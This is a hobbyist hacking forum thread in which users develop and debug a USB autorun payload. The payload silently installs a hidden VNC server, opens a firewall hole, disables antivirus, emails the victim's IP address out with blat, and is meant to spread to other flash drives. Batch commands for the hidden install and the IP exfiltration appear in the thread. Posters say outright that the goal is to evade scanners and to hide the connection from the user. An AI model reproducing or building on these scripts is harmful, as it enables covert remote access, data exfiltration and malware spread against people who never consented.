Switchblade + Hacksaw + VNC + nmap = spektormax's payload

[spektormax]

no prob, but ill do it tommororw (im relaly tired)

[spektormax]

Ok Ive put every thing in my payload into it:

http://www.hak5.org/wiki/Switchblade_Packages

[spektormax]

feel free to add to it

[keia71]

I cant seem to get the VNC portion to work.. Does anyone know what the hack is to just remove th eicon in the toolbar if vnc is already there

[spektormax]

I donno what it is ai grabed it form another place

[keia71]

I just redownloaded it from the site and it looks like I have the right version. I was trying to add the auto ipsender now and it looks like it works...I add an ipconfig to get the local ip of the machine along with the whatismyip.com to get the Ip for one in my house that I am testing with...

In my email I am only getting the first whatismyip.com file. I added mine to the email and it works if I run it manually..How can I change it to send the Ip Daily not every 30 minutes?

Sample:

for %%i in (ip.txt,c:iplocal.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup

[spektormax]

eh I donno I dont haev resend on mine

[keia71]

Ok so I am trying to debug this VNC installer and After the files are copied I get this:

18 file(s) copied.

System error 3 has occurred.

The system cannot find the path specified.

Press any key to continue . . .

____

Im not sure if it can not find the

net start winvnc or the nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

[Matt35]

I moved my question to the following page, in it's own topic, please help!

http://www.hak5.org/forums/viewtopic.php?p=41453#41453

--Matt

[keia71]

Still working on VNC issue. I am using this: It is not strting the service I get a message that says it can not find it. It does not appear to be a valid service. However I can start it manually..also if I just put winvnc in the install file instead of net start vnc it starts but just hangs there

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn" 

cd ../VNCInstallFiles 

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn" 

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h 

regedit /s ../CMD/vncdmp.reg 

regedit /s ../CMD/vncdmp1.reg 

regedit /s ../CMD/vncdmp2.reg 

ping -n 1 localhost > nul 

net start WinVNC 

nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

[spektormax]

I dono what the problem is, I had no problem with it (though I did not test it cuz I dont want vnc anyware with the password yougothacked, Ill test it later in my vmware later and get back to you

[spektormax]

I have updated the antidote to also unisntall VNC (it didn't do so before)

it now also properly uninstalls folding@Home vs being finished after restart. I have looked over the VNC thing, but have only dirty answers (I don't like using software that will show up on a virus scanner as I unfortuantly did with Folding (but avkill fixes that). With a little tool, I can install the service, however the little No-Icon hack isn't working for some reason.

[keia71]

Ya I noticed that the icon still showed up when I started it manually. I have been trying to figure out what the hack is that is suppose to make it invisibile.

[spektormax]

after like 3 hours of work I found the issues the regiestry ORLWInVNC3 had to be WInVNc3. I took advantage of the fact that I was fixing stuff, to update avkill to the 1.2BETA version. I also redid the antidote just a tad so it cleans up a few more things. Warning, there are now 2 files that will try a virus scanner. They are the file used to start folding silently and the file used to install VNC as a service. Both are solved using avkill. If you don't use the avkill, disable VNC and Folding or you might get virus scanners that pop up and vell at you. Also inorder for folding to work, it installes he avkill as a service. this is very crusial that this works, (it won't show up in services.msc but it will show up in the runs in the registry) (yes I now I could have used this on VNC but first of all I'm not sure if it would work right and I dont have a year to do it and check, and secoudn since avkill is already tehre why not use it.

[keia71]

Thanks for the VNC fix. I will try it later..on my way to work now..In the antidote what does csrss.exe do?

Also Im trying to figure out what is the Folding@home hack...

[spektormax]

well, unforchunatly the only way I found to install vnc as a service was a program I foind on the net. The problem is that virus scanners trip. SO you have to run avkill to stop them and then use it. YOu have to use it to remove it as well, so antidoe avkills then it uninstalls and then it shutdowns avkill. Folding@home hack instal folding at hoem and folds for U3_zomvies team

[spektormax]

I fixed the problem in VNC now it will make a "hole" for itself thru windows firewall

[keia71]

Does the antidote work for VNC. I can't gret it to uninstall. It looks like it does not actually take away the vnc icon in the toolbar but it keeps the status looking the same so the user does not know that you are connected....

Can you tell me what all the VNC hack does? I want to change the password but it will not let me now. I will redownload and try the antidote again

[spektormax]

first of all VNC has been VASTLY redone in the last 2 weeks (so has the new antidot old one didnt uninstall vnc) THe anditote removes everythings, delets the firectorys, deletes teh registries, uninstalls the service, and cleans up all traces. The latest antidote removes VNC completly, for anyone else that has a problem, make sure you download the latest version. Next time I relses parts (if I do) Ill put a post. Also if you guys want something in the payload that isn't let me know and Ill make it (asuming I can and have the tiem to)

[G-Stress]

@ spektormax

I would like to know how you would go about modifying the hacksaw part of code to where when any future flash drives are plugged it, it copies the hacksaw payload to it, as well as does it's current job. It was mentioned that be possible in the last episode, but I've yet to see it mentioned here.

It seems simple to do, but... if done wouldn't that drive need to be flashed also? That's where I think it could get complex.

[spektormax]

well 2 things 1 im wroking on that (in m head no real work yet) and 2 it woudl use the non U3 one that they woudl have to hit open on but wtill

[G-Stress]

@ spektormax

Gotcha, makes more sense also. I totally spaced the hacksaw on a non-U3. After as interesting and useful as your payload already is I'm shocked you haven't already added that... I got it, your not thinkin it in your head your commin back with something even more lethal and interesting ;)

[spektormax]

well 2 things that are an issue. 1 is that I cant get the dirve letter of the flash drive. Most likly I will just gra the drive letter when the drive is inserted and store it. And 2, I dont want skidies using it ot install thier little bots (you knwo what I mean)

[spektormax]

DOes any one know how to get the drive letter of a freshly insterted drive, (I dont have the MSVB 6.0 compiler) or perhaps just in hte sbs,exe add a strcpy, and copy the infro in hte dummy to the end of "send,bat" and shell execute that. THat woudl be enough for me to get it to work.

edit: I figured out how to do it, production of ICBM has begun

[Moo]

What exactly is on the ICBM?